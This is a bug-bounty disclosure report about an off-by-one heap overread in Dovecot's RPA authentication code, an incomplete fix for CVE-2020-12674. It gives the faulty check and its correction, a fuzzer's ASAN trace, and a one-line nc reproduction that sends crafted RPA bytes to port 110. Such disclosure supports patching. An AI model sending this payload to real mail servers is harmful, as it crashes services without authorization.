Open-Xchange: Buffer overread off by one in `rpa_read_buffer`, incomplete fix for CVE-2020-12674

2020-08-2607:17:35

catenacyber

hackerone.com

$400

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

JSON

In function rpa_read_buffer, the condition in

	if (p &gt; end)
		return 0;

	len = *p++;

is not strict enough

It should be

	if (p &gt;= end)
		return 0;

	len = *p++;

The fix from https://github.com/dovecot/core/commit/69ad3c902ea4bbf9f21ab1857d8923f975dc6145 is not enough

The ASAN stack trace is

=================================================================
==27414==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000006be at pc 0x00010fd2dd33 bp 0x7ffedff66f00 sp 0x7ffedff66ef8
READ of size 1 at 0x6040000006be thread T0
    #0 0x10fd2dd32 in rpa_read_buffer mech-rpa.c:226
    #1 0x10fd2d757 in rpa_parse_token3 mech-rpa.c:283
    #2 0x10fd2c44b in mech_rpa_auth_phase2 mech-rpa.c:504
    #3 0x10fc99d79 in LLVMFuzzerTestOneInput fuzz-auth-server.c:169

Steps to reproduce should be

(echo 'AUTH RPA'; echo -ne
'`\x11\x06\x09`\x86H\x01\x86\xf8s\x01\x01\x01\x00\x04\x00\x00\x01';
echo -ne '`\x11\x06\x09`\x86H\x01\x86\xf8s\x01\x01\x00\x04A@A\x00')  | nc 127.0.0.1 110